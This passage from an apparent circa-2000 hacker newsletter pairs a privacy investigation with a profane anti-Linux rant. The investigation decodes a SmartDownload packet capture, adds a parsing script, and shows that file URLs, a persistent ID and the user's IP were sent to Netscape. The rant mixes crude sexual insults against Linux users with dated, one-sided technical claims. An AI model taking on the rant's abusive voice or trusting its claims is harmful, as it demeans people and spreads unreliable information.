0110: 3B 20 44 65 63 20 20 37 20 31 39 39 38 29 0D 0A  ; Dec  7 1998)..
0120: 48 6F 73 74 3A 20 63 67 69 2E 6E 65 74 73 63 61  Host: cgi.netsca
0130: 70 65 2E 63 6F 6D 3A 38 30 0D 0A 52 61 6E 67 65  pe.com:80..Range
0140: 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 41 63 63 65  : bytes=0-..Acce
0150: 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D  pt: */*..Accept-
0160: 4C 61 6E 67 75 61 67 65 3A 20 65 6E 0D 0A 41 63  Language: en..Ac
0170: 63 65 70 74 2D 43 68 61 72 73 65 74 3A 20 69 73  cept-Charset: is
0180: 6F 2D 38 38 35 39 2D 31 2C 2A 2C 75 74 66 2D 38  o-8859-1,*,utf-8
0190: 0D 0A 43 6F 6F 6B 69 65 3A 20 55 49 44 43 3D 32  ..Cookie: UIDC=2
01A0: 30 37 2E 37 31 2E 39 32 2E 32 30 36 3A 30 39 36  07.71.92.206:096
01B0: 33 35 33 33 30 30 32 3A 32 33 38 32 31 31 0D 0A  3533002:238211..
01C0: 0D 0A

This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into individual lines, and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" given to the Netscape server, is:

GET /cgi-bin/sd_server.cgi?platform=win98&version=1,+1,+0,+66&url=http://grc.com/files/tip.exe&Key=BRUNO396DF273 HTTP/1.0

This long line can then be further broken down into its various components:

GET /cgi-bin/sd_server.cgi
    platform=win98
    version=1,+1,+0,+66
    url=http://grc.com/files/tip.exe
    Key=BRUNO396DF273
HTTP/1.0

The balance of the data transmitted consists of the additional information "parameters" shown below:

Pragma: no-cache
Connection: Keep-Alive
User-Agent: NetZip-Downloader/1.0.62 (Win32; Dec 7 1998)
Host: cgi.netscape.com:80
Range: bytes=0-
Accept: */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Cookie: UIDC=207.71.92.206:0963533002:238211

So, what does the data analysis show us?

The complete URL of the file I downloaded was sent to Netscape: "url=http://grc.com/files/tip.exe".
Netscape thus knows what site I was visiting and what file(s) I clicked on to download.

My machine and I have been "tagged" by the "Key" of: "BRUNO396DF273". Interestingly, "Bruno" is the name of the machine I used for this testing. So, the machine's name is being sent as part of my "ID". Also, I performed this experiment SEVERAL TIMES, shutting down the machine and rebooting . . . and the key's value never changed. Thus, it is clearly serving as a "persistent tag" and is being used to uniquely identify me from one use of the download utility to the next.

After seeing the "BRUNO396DF273" tag being sent, I searched the Windows Registry for that tag string. I found it in my machine's Registry at:

    HKEY_LOCAL_MACHINE\Software\Nsda\1.1\Options\UserID

This makes it pretty clear that the tag is, indeed, a persistent "UserID" (by their own label) which has been assigned to my machine for the purpose of long-term, unique identification. Note that any time Netscape (or anyone else) ever wants to, they could access that public registry key and immediately tie me, and this machine, to my entire past download history.

IMPORTANT!: Users of Netscape's Smart Download utility who unwittingly joined Netscape's "NetCenter" system are especially at risk of privacy violation, because NetCenter members also have their NetCenter logon ID and their personal eMail address sent with each file download report! So much for never including any "personally identifiable" information. This means that the user's NetCenter logon ID (many people simply use their names) and eMail address are both being transmitted along with the name of every file downloaded by Smart Download.

And finally . . . check out the "Cookie" field that is being sent! (It is the last field of the last group above.) The glob at the end includes encoded date and time information, but immediately after the "UIDC=" is my machine's IP address!! So Netscape apparently thought that would be a good thing for them to have also.
Since it's in a "cookie" field, it will pass through "anonymizers", "proxies", and NAT routers, which would otherwise obscure the user's true IP address. In other words, since the machine's own IP address has been included in this "cookie", using the Internet through an "IP anonymizing service" will NOT prevent Netscape/AOL from learning the machine's TRUE IP. Netscape receives it directly from their software running in the user's computer.

In Summary . . .

So what does it all mean? I am not a Netscape or RealNetworks programmer, so I can only go by the evidence presented through an analysis of the available data. I've read the "fine print" of their various license agreements carefully several times, and I've examined their online FAQ pages. There seems to be no question that by "agreeing" to the license, the user allows these companies to gather any sort of data they desire. The licenses seem strangely self-contradictory and quite unclear about what is being collected, stored, retained, compiled, used . . . and what is not, and why.

A close reading of the NetZip Download Demon license reveals an assertion interestingly absent from the otherwise very similar RealDownload license:

    "No unique identifier or any personally identifiable information is sent with this information;"

It would appear that someone at RealNetworks realized that NetZip's license had always been misleading its 14 million users, since a "unique identifier" was, in fact, always being sent along with the file download information. As a result, did RealNetworks remove the identifier? No. From their version of the NetZip license, RealNetworks simply removed the assertion that there was no identifier. Yet these are the same people who are asking us to trust them with the fact that they could be recording the name and location of every single file we download through the Internet? . . . which is clearly tagged with our unique ID and with our machine's IP address?
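The same dissection done mechanically, as an added example that is not part of the original article: the script below takes the hex columns of the packet dump shown above, strips the Ethernet, IPv4 and TCP headers, decodes the HTTP request, and checks whether the address inside the UIDC cookie is the same one the IP header carries as its source. The dump text is copied from the page; the parsing code and its function names are constructed here.

```python
import re
import struct
from urllib.parse import unquote

# Hex columns of the packet dump shown on the page (ASCII column omitted);
# copied here so the example runs offline.
SMART_DOWNLOAD_DUMP = """
0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00
0010: 01 B4 9C 00 40 00 80 06 15 97 CF 47 5C CE CF C8
0020: 4B CE 04 11 00 50 00 05 0B 11 2C BB 35 01 50 18
0030: 22 38 44 F5 00 00 47 45 54 20 2F 63 67 69 2D 62
0040: 69 6E 2F 73 64 5F 73 65 72 76 65 72 2E 63 67 69
0050: 3F 70 6C 61 74 66 6F 72 6D 3D 77 69 6E 39 38 26
0060: 76 65 72 73 69 6F 6E 3D 31 2C 2B 31 2C 2B 30 2C
0070: 2B 36 36 26 75 72 6C 3D 68 74 74 70 25 33 41 25
0080: 32 46 25 32 46 67 72 63 2E 63 6F 6D 25 32 46 66
0090: 69 6C 65 73 25 32 46 74 69 70 2E 65 78 65 26 4B
00A0: 65 79 3D 42 52 55 4E 4F 33 39 36 44 46 32 37 33
00B0: 20 48 54 54 50 2F 31 2E 30 0D 0A 50 72 61 67 6D
00C0: 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 43 6F 6E
00D0: 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C
00E0: 69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A
00F0: 20 4E 65 74 5A 69 70 2D 44 6F 77 6E 6C 6F 61 64
0100: 65 72 2F 31 2E 30 2E 36 32 20 28 57 69 6E 33 32
0110: 3B 20 44 65 63 20 20 37 20 31 39 39 38 29 0D 0A
0120: 48 6F 73 74 3A 20 63 67 69 2E 6E 65 74 73 63 61
0130: 70 65 2E 63 6F 6D 3A 38 30 0D 0A 52 61 6E 67 65
0140: 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 41 63 63 65
0150: 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D
0160: 4C 61 6E 67 75 61 67 65 3A 20 65 6E 0D 0A 41 63
0170: 63 65 70 74 2D 43 68 61 72 73 65 74 3A 20 69 73
0180: 6F 2D 38 38 35 39 2D 31 2C 2A 2C 75 74 66 2D 38
0190: 0D 0A 43 6F 6F 6B 69 65 3A 20 55 49 44 43 3D 32
01A0: 30 37 2E 37 31 2E 39 32 2E 32 30 36 3A 30 39 36
01B0: 33 35 33 33 30 30 32 3A 32 33 38 32 31 31 0D 0A
01C0: 0D 0A
"""


def hexdump_to_bytes(dump):
    """Read 'OFFSET: xx xx ...' rows; stop at the ASCII column or a short row."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.partition(":")[2].split()[:16]:
            if not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def tcp_payload(frame):
    """Strip Ethernet, IPv4 and TCP headers; return (src_ip, dst_ip, payload)."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:
        raise ValueError("not TCP")
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    return src, dst, tcp[(tcp[12] >> 4) * 4:]


def parse_http_request(payload):
    """Return (path, query params, headers) of a plain HTTP/1.0 request."""
    lines = payload.partition(b"\r\n\r\n")[0].decode("latin-1").split("\r\n")
    target = lines[0].split(" ")[1]
    path, _, query = target.partition("?")
    # unquote() turns %3A/%2F into ':' and '/' but leaves '+' literal,
    # which matches the decoding shown in the article.
    params = {k: unquote(v) for k, _, v in (p.partition("=") for p in query.split("&"))}
    headers = {n.strip(): v.strip() for n, _, v in (l.partition(":") for l in lines[1:])}
    return path, params, headers


def analyze(dump):
    """List the identifying fields one Smart Download request hands to the server."""
    src_ip, dst_ip, payload = tcp_payload(hexdump_to_bytes(dump))
    path, params, headers = parse_http_request(payload)
    m = re.search(r"UIDC=(\d{1,3}(?:\.\d{1,3}){3})", headers.get("Cookie", ""))
    cookie_ip = m.group(1) if m else None
    return {
        "src_ip": src_ip,
        "dst_ip": dst_ip,
        "path": path,
        "params": params,
        "headers": headers,
        "downloaded_url": params.get("url"),
        "persistent_id": params.get("Key"),
        "cookie_ip": cookie_ip,
        # The client's own address inside the Cookie header travels as
        # application data, so a proxy or NAT in between does not rewrite it.
        "ip_leaks_via_cookie": cookie_ip is not None and cookie_ip == src_ip,
    }


if __name__ == "__main__":
    for key, value in analyze(SMART_DOWNLOAD_DUMP).items():
        print(f"{key}: {value}")
```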
For most people, the main issue revolves around whether or not a report of every file downloaded with those utilities is transmitted back to their home base . . . and there's just no question any longer that unless deliberately disabled by the user, this is being actively done. If that bothers you, you may wish to immediately remove these downloading tools from your system. Any of these file download spies may be removed through Windows' standard Add/Remove Programs feature located in the Windows Control Panel. You will find them listed as "Netscape SmartDownload", "RealDownload", and "NetZip Download Demon".

An additional privacy risk involves whether, to what degree, and to what end, historical file downloading profiles are being compiled about individuals, whether or not they are known by name and address and "personally identifiable." Netscape has been completely silent on this issue, whereas RealNetworks has gone absolutely ballistic over my pointing out what it has apparently lied about and what it could be doing with the data that has been sent to its servers. As I have repeatedly stated, I have no evidence, information, or knowledge either way. But trust is what it all boils down to, and RealNetworks' record on that score seems to be getting shakier with every passing day.

Why is a unique ID tag being transmitted at all?

I can only address that larger question by asking: "If these companies do not care about us in any unique way separate from everyone else (as they claim) then WHY are they going to all the trouble of uniquely tagging every user's computer and deliberately transmitting not only that unique ID tag, but also in the case of Netscape sending the user's Internet IP address with each and every download file report?" This is not required for the purpose of identifying what files are downloaded "in aggregate", or learning when their downloading program is installed or removed from the host computer . . .
contrary to what seems to be stated in their various license agreements. Therefore, it is difficult to understand the motivation behind collecting personal data which is, on its face, unnecessary for the stated objective.

One Final Observation:

The stated purpose behind all of this download profiling (in their respective licenses) is to inform these vendors about the files we are all (collectively) downloading so that they can provide some sort of additional, useful, or auxiliary information to us (this is never really made clear). Yet, the date shown for the NetZip Downloader (version 1.0.62 which was captured in the outbound TCP/IP data packet shown above) is December 7th of 1998. So, this data gathering has presumably been underway since before that date. That's been quite a while. When does the payback for all these years of "aggregate" user profiling begin? And who receives the value? And, moreover, given the highly dynamic nature of Internet content, does the whole idea of collecting such data really make any sense anyway? It makes one wonder what's really going on here . . . doesn't it?

Certainly Newsworthy . . .

Frankly, once all of the facts are exposed and aired, I wouldn't blame anyone for being quite upset by the whole story. We now know, with absolute certainty, that more than 14 million NetZip Download Demon users have been misled by the product's license agreement. And it is this deceived "asset base" which RealNetworks recently purchased. How nice. So, it's hardly surprising that the online news media has picked up on and reported the news of a Class Action Lawsuit brought against Netscape/AOL over their Smart Download spyware.
These stories provide some additional background information about the secret spying activities of these programs:

    Wired News: Privacy Suit Targets Netscape
    ZDNet News: AOL/Netscape hit with privacy lawsuit

Keeping Yourself Informed

Within hours of my confirmation of this potentially serious privacy breach, the 338,584 current members of our User-Managed eMail Notification System received a brief piece of eMail outlining my findings and inviting them to examine the additional resources here for additional information and interaction. So, if you are a newcomer to this site and are not already a member of our eMail Notification System, you might want to consider joining. As detailed in our formal Privacy Statement, your eMail address will never be disclosed, and you are completely free to remove yourself from the system if you ever choose to.

For Further Discussion . . .

Since my recent findings and the questions they raise about the behavior of the Netscape/Real Networks/NetZip download utilities were first disclosed to members of our User-Managed eMail Notification System, that is the topic receiving intense discussion, debate, and discovery over in our online "newsletter" discussion forum:

    news://grc.com/newsletter

To learn more about this problem, to share your feelings and perhaps your outrage, or to learn more about detecting and removing these utilities . . . or for virtually anything related to this topic: please jump over to our "Newsletter Discussion Page", and from there into the newsletter discussion forum. I'm certain you'll be glad you did! And thanks very much for your interest and continued support of my work!

You are encouraged to browse and perhaps participate in our online newsletter discussion of this issue.
The contents of this page are Copyright (c) 2000 by Gibson Research Corporation. SpinRite, ChromaZone, ShieldsUP! and the iconic character "Mo" are registered trademarks of Gibson Research Corporation, Laguna Hills, CA, USA.

~ ~ ~

@HWA

312.0 [IND] Why Linux sucks.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by Duro

I highly recommend you visit this site, here is the general gist but there is much more informative material there and well worth the visit for any serious admin worth his salt. - Ed

http://www.spatula.net/proc/linux/index.src

WHY LINUX SUCKS

"Testing? What's that? If it compiles, it is good, if it boots up, it is perfect." - Linus Torvalds

Welcome to the beginnings of my "why linux sucks" page. There isn't much here just yet, but there are so many reasons, both technical and non-technical, that linux sucks that this page will surely fill up quickly. I've opened the page up to linking again...except from slashdot.

Here's a short list of Linux flaws that make it look silly:

- /usr/include/linux (come on. honestly.) Lame. Nonstandard. (for the clue-deprived, this means that any code written for linux using the linux/ headers will be incompatible with all other Unix flavors.) Guess what: string.h, types.h, malloc.h, signal.h, and so on don't belong in a platform-specific include directory. Hope you didn't want to port your code...
- Neither the sigaction manpage nor the signal.h includes indicate what the system defaults are. Of course, they've put signal.h in /usr/include/linux...
- "intro" manpages are a joke. Compare the BSD section 2 intro with the one from Linux.
- file systems mount async by default (power outage and your fs dies)
- Most linux users don't have pubes yet and are intolerably lame (3Y3 4m 1337 H4x0r d00d [uz 3y3 h4v3 L1Nux!)
- Too many things in user space that belong in the kernel (nfs)
- Too many things in the kernel that belong in user space (java)
- No standard distribution. Linux people say this is a good thing? Try writing software or software configuration instructions when you never know how the OS is going to be laid out, or try finding the responsible party for a block of OS code, or try fixing security problems when they arise and you'll see that this is NOT a good thing at all.
- no consistent pronunciation of the OS's name (line-ucks? lynn-ucks?)
- svr4? bsd? make up your mind?
- Lame NFS & dd

    { From: Alfred Perlstein

    time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k
    219+1 records in
    219+1 records out
    28760021 bytes transferred in 3.411756 secs (8429683 bytes/sec)
    0.000u 0.443s 0:03.42 12.8% 91+667k 0+17io 0pf+0w

    (that's freebsd)

    time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k
    219+1 records in
    219+1 records out
    0.010u 1.550s 0:16.00 9.7% 0+0k 0+0io 84pf+0w

    (linsux) [Redhat 5.1]

    this is on the same 100mbit segment. i'm using NFS over TCP and linux is using UDP both to the same Solaris 5.6 box. also, note how much linux dd sucks ass. (still smirking)

    Alfred Perlstein }

- #linux, #hack, #linuxwarez...
- New kernel every week that breaks half your applications (see end of the article #breakage)
- Security flaw/Root compromise of the week (see below)
- glibc? libc? libc5? libc6? glibc2?
- /bin/sh != sh; /bin/sh == bash. Lame. Nonstandard. Result: broken shell scripts and nonportable code.
- /usr/bin/make != make; /usr/bin/make == gmake. Lame. Nonstandard. Same result as above: nonportable code.
- ext2fs
  - Linux will mount partitions that are not clean
  - can't handle partitions > 2GB (I've heard they finally fixed this one)
  - e2fsck deliberately leaves/creates corrupt files (if there is a block that is duplicated between two files, e2fsck will clone the duplicate (while fsck will remove both files. This can also result in a user gaining unauthorized access to another user's data.))
- it swap likes swap to swap swap too swap often
- swap only allows 128M of swap at a time; for 1G of swap, you need 8 swap partitions
- can't handle more than 1GB of RAM
- To install Joe's program, you need Bob's kernel hack, but for Bob's kernel hack, you've got to have Suzy's patches, but Suzy's patches only work with a year-old kernel, unless you get Mike's patches to Suzy's patches, but even then, those conflict with Jeff's drivers, which can be resolved only by installing Nancy's patches...
- Can't handle the same IP on more than one interface
- Can't handle large files

    { Help, mommy! I can't handle the BIG files!
    (names have been changed to protect the innocent)

    qqq(4)% uname -a
    SunOS qqq.zz.xxxxx.xxx 5.6 Generic_105181-07 sun4u sparc SUNW,Ultra-2
    qqq(5)% ls -l
    total 7330114
    -rw-r--r--   1 root     root     110622720 Oct 27 03:01 zzz.xxxxx.xxx.tar
    -rw-r--r--   1 root     other    313320448 Oct  7 17:06 file1.tar
    -rw-r--r--   1 root     other      5079040 Aug 16 22:33 file2.tar
    -rw-r--r--   1 root     other   1107240960 Aug 16 22:39 file3.tar
    -rw-r--r--   1 root     other     52045312 Oct 27 03:57 file4.tar
    -rw-r--r--   1 root     root    2162790400 Oct 27 21:56 file5.tar

    wwww(36)% uname -a
    Linux wwww.zz.xxxxx.xxx 2.1.117 #4 SMP Tue Aug 25 01:37:46 EDT 1998 i686 unknown
    wwww(37)% ls -l
    ls: file5.tar: File too large
    total 1551913
    -rw-r--r--   1 root     root     110622720 Oct 27  1998 zzz.xxxxx.xxx.tar
    -rw-r--r--   1 root     bin      313320448 Oct  7  1998 file1.tar
    -rw-r--r--   1 root     root       5079040 Aug 16  1998 file2.tar
    -rw-r--r--   1 root     root    1107240960 Aug 16  1998 file3.tar
    -rw-r--r--   1 root     bin       52045312 Oct 27  1998 file4.tar }

- Max file size: 2GB. (*BSD: 4 Terabytes)
- Dynamically linked root shell. Doom!
- lilo! any boot loader that needs to have magic block numbers is wrong
- linux icmp.h is *NOT* unix icmp.h - they're totally incompatible.
- flatfile password files make listing large ftp directories impossible due to huge numbers of flatfile searches.
- password file can be non-shadowed - encrypted passwords visible to all
- shadow.h! hahahahahahaha!
- Slowass network code (see http://www.nfr.net/nfr/SYSTEM_NOTES.html#LinuxGeneral)
- Did I mention slowass network code? (see http://neuromancer.rmci.net/linux-vs-freebsd.html)
- Oh, also slowass network code (see http://www.spatula.net/proc/linux/localhost.src)
- Miserably pathetic threading implementation doesn't scale for shit: all threads wake up on signals (stampeding process problem).
- L1nux c0d3rz!

    { 3y3 wr1t3 31337 c0d3!

    It's amazing how terminally clueless 31337 L1nux c0d3rz can be. Those of you who follow Bugtraq, for example, have probably seen this bit of 31337 c0d3:

        #ifdef STRANGE_BSD_BYTE_ORDERING_THING
        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
        #define FIX(n) (n)
        #else /* OpenBSD 2.1, all Linux */
        #define FIX(n) htons(n)
        #endif /* STRANGE_BSD_BYTE_ORDERING_THING */

    Apparently these kiddies slept that day when Big and Little Endian were explained in their high school architecture classes, and also that day in their college networks class (oh wait; they're not old enough to be in college) when htons was discussed in relation to network byte ordering. For you L1nux cl00b13z, you should always call htons(3) on integers you plan to stick in a network header. Htons has a platform-dependent implementation that guarantees a result in network byte order. The cl00b13 who wrote the above code not only wrote broken code, but also wrote code that, in effect, does absolutely nothing more than a simple call to htons(3).

    Harold Gutch said it best in a comment he inserted into the "nestea" exploit, as he corrected some stupid L1nux k1dd13 c0d3: (see http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-22&msg=19980427012153.18775@foobar.franken.de)

        /* bsd usage works now, the original nestea.c was broken, because some braindead
         * linsux-c0d3r was too stupid to use sendto() correctly */
    }

- LILO can't cope with kernels > 1Mb, so the kernel has to be gzipped.
- strfry and memfrob
- Can't cope with hard drives > 32GB
- GPL - a license and a virus
- Fundamental design and direction problems. It turns out that Linus is not the smartest man in the world and the saviour of all mankind. (see #fundamental at end of article)
- OS or religion?
- UNABLE TO LOAD INTERPRETER...memory leak much?
- This is a real Linux error message: "Uhhh. NMI recieved. Dazed and Confused. Trying to cope" ...such professionalism!
- The GNU su manpage actually says this: (see http://www.freebsd.org/cgi/man.cgi?query=su&apropos=0&sektion=0&manpath=Linux+Slackware+3.1&format=html)

    "This program does not support a "wheel group" that restricts who can su to super-user accounts, because that can help fascist system administrators hold unwarranted power over other users."

  ...apparently it's better for any user to attack the root password than to offer added security. Ignorance of security is a common Linux thread.
- vi != vi; vi == vim. vim links to X libraries. Wipe X, and now you can't use vi. Retards.
- Still no USB support in 2000, after NetBSD and FreeBSD have had it for nearly 2 years. So much for the "million geeks" theory of rapid software development.

I don't expect this list to be up to date; Linux is impossible enough to keep up with as a user, and it's even harder to keep up with how broken and lame it is this week. In general, the further something is down the list, the newer the information is.
It's almost surprising how much of the older items still hold true today, until you consider the fragmented and undirected development effort.

Before you wet the briefs your mommy bought for you at Target and frantically search for a link to email me something about how "it's not like that anymore" or "how dare you insult Linux! I will h4x0r you!" or other such standard Linux sycophant drivel, consider for a moment that I just don't give a fuck what you have to say. I understand that it can be upsetting to you to see your precious OS exposed as the garbage it is. I've heard it all before, so you can save your energy for something more complex and important to you, like learning how to masturbate. (you know, like see: http://www.jackinworld.com)

Perhaps the greatest crime of Linux is the production of nonportable code. The Linux c0d3rz wave the free-software flag, but they're just as bad as Microsoft in making software that can run only under their OS.

Check out my favorite Linux joke. (http://www.spatula.net/proc/linux/linux.joke.src)

Also read aard's linux joke:

    "once upon a time there was this guy who wanted to bring his products to the internet for sale. so he investigated e-commerce, and scalability, robustness, and synergy. and he decided to run linux."

-=-

News Articles, Interviews, etc

Throughout all of these, it's interesting to note the typical Linux kiddie reaction to proof that their OS sucks ass. It's always something like:

    1. The test wasn't "fair"
    2. What about new kernel x.y.z?
    3. You can't expect
    4. The people doing the test must be mean/biased
    5. It wasn't tuned properly
    6. They didn't look at the latest release of Red Hat x.y!

They really seem like 4-year-olds who have just been denied a pack of gum in a grocery store.
- Linux reviews are bought- not earned (http://news.tucows.com/linux/linux07072000.html)
- Bad Linux Advocacy FAQ - a must-read (http://www.softpanorama.org/OSS/bad_linux_advocacy_faq.shtml)
- Sendmail developers have discovered a big gaping hole present in ALL linux kernels up to and including 2.2.15. (http://sendmail.net/?feed=000607linuxbug)
- Security Focus statistics page. Note how only Windows NT has had more security problems than Linux. (http://www.securityfocus.com/vdb/stats.html)
- Linux loses Wall Street's interest... fancy that: Linux, it turns out, is not the greatest thing ever (http://dailynews.yahoo.com/h/zd/20000526/tc/linux_losing_its_buzz_on_wall_street_1.html)
- Another Wall Street story of Linux firms merging, hoping to actually turn a profit. Wow! (http://dailynews.yahoo.com/h/cn/20000524/tc/linux_sellers_merge_eye_profitability_1.html)
- Linux is not mature enough for high-end computing (http://dailynews.yahoo.com/h/cn/20000517/tc/commentary_market_not_ready_for_high-end_linux_systems_1.html)
- Linuxcare go spaf! (http://dailynews.yahoo.com/htx/zd/20000522/tc/can_linuxcare_stay_afloat__1.html)
- This is hella funny (http://www.overclocked.org/OCwhinux.htm)
- Alan Cox is to blame for the big gaping hole, and didn't even catch the most foolish and common of CGI mistakes. Alan Cox is one of the lead Linux kernel coders. (http://slashdot.org/comments.pl?sid=00%2F04%2F25%2F037238&cid=121&pid=0&threshold=5&mode=flat&commentsort=0#121)
- Big gaping hole in Red Hat security. Fat fucking surprise! (http://www.msnbc.com/news/399125.asp)
- Linux is marketing and hype according to this Wall Street Journal article (http://dowjones.wsj.com/n/SB936961814325017645-d-main-c1.html)
- Linux is marketing and religion according to this ZDnet article (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2_)
- Interview with Keith Bostic including the quote "Linux and Microsoft both started from scratch, and it showed." (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2)
- ZDnet article about Linux fragmentation (http://www.zdnet.com/zdnn/stories/news/0,4586,2470425,00.html)
- Debugging is hard! let's go shopping! (http://dailynews.yahoo.com/htx/cn/20000315/tc/20000315168.html)
- Dorks. (http://biz.yahoo.com/bw/000313/ma_andover_1.html)
- The thrill is gone for Linux (http://www.zdnet.com/zdnn/stories/news/0,4586,2458906,00.html)
- Don't invest in Linux! (http://dailynews.yahoo.com/h/cn/20000229/tc/20000229058.html)
- Even the SuSe CEO says that Linux is poo (http://www.cnn.com/2000/TECH/computing/03/02/no.linux.desktop.idg/index.html)
- SCOWorld article that says, in part: "In our tests of these operating systems, all but one of the Linux systems suffered two or more crashes during the testing period. The FreeBSD system and both SCO operating systems suffered no crashes at all." (http://www.scoworld.com/jf00rdup.html)
- Computerworld: three UNIX systems better than Linux (http://www.computerworld.com/home/print.nsf/All/000207E972?OpenDocument&~f)
- PC Week article about how Linux is overexaggerated (http://www.zdnet.com/filters/printerfriendly/0,6061,372462-54,00.html)
- Computerworld interview with SCO's CEO calling Linux a religion. (http://www.computerworld.com/home/print.nsf/all/990426A08E)
- ZDnet article about Linux Security- and how badly it sucks ass. (http://www.zdnet.com/zdnn/stories/news/0,4586,2430772,00.html)
- Linux is Obsolete - a series of well-circulated Usenet postings in a thread started by Andy Tanenbaum, a respected Operating Systems authority. Note how Tanenbaum presents himself vs Linus having a tantrum. (http://www.educ.umu.se/~bjorn/mhonarc-files/obsolete/maillist.html)
- ZDnet article about the recent (2/14/00) Denial of Service attacks which says, in part: "The three DDoS tools in wide distribution on the Internet rely on known security vulnerabilities of Solaris and Linux." so you can thank Linux for the last wave of Denial of Service attacks. (http://www.zdnet.com/pcweek/stories/news/0,4153,2436770,00.html)
- JWZ's article about how linux is only free if your time has no value. For those that don't know, JWZ is a very clever guy who was deeply involved in the development of Netscape & Mozilla for some time (http://www.jwz.org/doc/linux.html)
- ZDnet review of linux as a web server, including mention of how the tcp/ip stack is broken in the 2.2 kernel, which is a perfect example of the mention above about new kernels breaking applications. (http://www.zdnet.com/devhead/stories/articles/0,4413,2258790,00.html)
- Linux: poo FreeBSD: good (http://www.idg.net/go.cgi?id=161881) (HWA runs bsd...lol - Ed)
- The Linux Myth - John Dvorak on ZDnet (http://www.zdnet.com/zdnn/stories/comment/0,5859,2338326,00.html)
- Daemon News article outlining many of the misconceptions that Linsux weenies spread about BSD. (http://www.daemonnews.org/199909/freebsd.html) (Read this too - Ed)
- Web server comparison showing that Linux is still slower than FreeBSD (http://perl.pattern.net/bench/)
- Byte Magazine article outlining how "Linux is only free if your time has no value" (http://www.byte.com/columns/Be_view/1999/06/0607Be_view.html)
- NT Magazine outlines many Linux shortcomings (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=5048)
- Another NT Magazine article (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=4502)
- Mindcraft says that FreeBSD outperforms Linux in this article defending their benchmarks (http://www.mindcraft.com/whitepapers/rebut-abcnews.html)
- Read what Ken Thompson has to say about Linux (http://www.spatula.net/proc/linux/thompson.src)
- FreeBSD is faster than Linux (http://www.it.fairfax.com.au/990316/openline1.html)
- NT is faster than Linux (http://www.mindcraft.com/whitepapers/nts4rhlinux.html)
- A news.com article discussing Linux shortcomings (http://news.com/News/Item/0,4,34918,00.html)
- Here's a zdnet article that details why Linux's time is over. (http://www.zdnet.com/zdnn/content/pcwk/1521/317585.html)
- NT is better than Linux (http://www.zdnet.com/pcweek/stories/columns/0,4351,377260,00.html)
- The anti-linux crusade (http://abcnews.go.com/sections/tech/FredMoody/moody981120.html)

thanks to: urg, aard, brightmn, imperial, ee, foo, JB, cykyc

Sun Jul 30 04:31:48 EDT 2000
linux/index.src Updated: Fri Jul 21 2000 1:13.15
Copyright © 1998-1999 by Nick Johnson. All rights reserved.

#breakage

From http://kt.linuxcare.com/latest.epl of 2/3/2000, here is an example of the Linux API changing and generally fucking over those who develop commercial software for it.

Block Device Interface Change And Related Pain
2000/01/07 - 2000/01/11 (52 posts): [ANNOUNCE] block device interfaces changes

Alexander Viro announced that the block device interface would be changing, and that some of these changes had made it into 2.3.38; he listed:

    1. New type (struct block_device) is defined. We have a cache of such objects, indexed by dev_t. struct block_device * is going to replace kdev_t for block devices. Handling of the cache is done in fs/block_dev.c

    2. They have methods (struct block_device_operations). Currently the set is { open, release, ioctl, revalidate, check_media_change }. For now (and it's going to change) types are the same as in file_operations. However, in the near future they are going to become

           int (*open)(struct block_device *bdev, mode_t mode, unsigned flags);
           int (*release)(struct block_device *bdev);
           int (*ioctl)(struct block_device *bdev, unsigned cmd, unsigned long arg);
           int (*revalidate)(struct block_device *bdev);
           int (*check_media_change)(struct block_device *bdev);

    3. ->revalidate() and ->check_media_change() disappeared from file_operations.

    4. register_blkdev() takes block_device_operations instead of file_operations now. For one thing, it means that block devices are more or less insulated from all future changes in file_operations (Good Thing(tm)). For another, it means that drivers should be modified. I did the change for all drivers in the main tree, see the patch for details. It's pretty easy.

    5. blkdev_open() doesn't change ->f_op. def_blk_fops has all needed methods (open, release and ioctl call the methods from block_device_operations, indeed).

    6. Inodes got a new field: i_bdev. Filesystems should not worry about it - just remember to call init_special_inode() when you are initializing device/fifo/socket in-core inode (in foo_read_inode() or in foo_mknod(); all filesystems in the tree are doing it now). Contents of this field: pointer to struct block_device if it is a block device inode, NULL otherwise.

    7. Superblocks got a new field: s_bdev. Handled by code in fs/super.c, points to the struct block_device if the mount is device-backed, NULL otherwise (i.e. for NFS, CODA, procfs, etc.).

    8. do_mount() first argument is struct block_device * now. It does the right thing for non-device mounts - just pass NULL and it will work (allocate the anonymous device, etc.)

    9. Instead of calling get_blkfops(), use ->bd_op in struct block_device. Moreover, better use blkdev_get()/blkdev_put()/ioctl_by_bdev() (see examples in mm/swapfile.c, drivers/char/raw.c, fs/super.c, fs/isofs/inode.c, fs/udf/lowlevel.c).

